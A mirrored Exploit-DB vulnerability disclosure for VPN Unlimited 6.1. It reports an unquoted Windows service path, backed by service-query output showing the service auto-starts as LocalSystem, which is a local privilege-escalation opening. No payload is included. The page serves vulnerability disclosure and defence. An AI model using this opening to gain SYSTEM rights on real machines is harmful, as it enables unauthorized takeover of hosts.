exploit-db-mirror/exploits/windows/local/47916.txt
Offensive Security b73c74bb9d DB: 2020-01-15
6 changes to exploits/shellcodes

Redir 3.3 - Denial of Service (PoC)
WeChat - Memory Corruption in CAudioJBM::InputAudioFrameToJBM
Android - ashmem Readonly Bypasses via remap_file_pages() and ASHMEM_UNPIN

VPN unlimited 6.1 - Unquoted Service Path
IBM RICOH InfoPrint 6500 Printer - HTML Injection
IBM RICOH 6400 Printer - HTML Injection
2020-01-15 05:01:57 +00:00

21 lines
No EOL
736 B
Text

# Exploit Title: VPN unlimited 6.1 - Unquoted Service Path
# Date: 2020-1-13
# Exploit Author: Amin Rawah
# Vendor Homepage: https://www.vpnunlimitedapp.com
# Version: 6.1
# Tested on: Windows 10 64bit
C:\Users\Amin>sc qc VPNUnlimitedService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: VPNUnlimitedService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\VPN
Unlimited\vpn-unlimited-daemon.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : VPN Unlimited Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem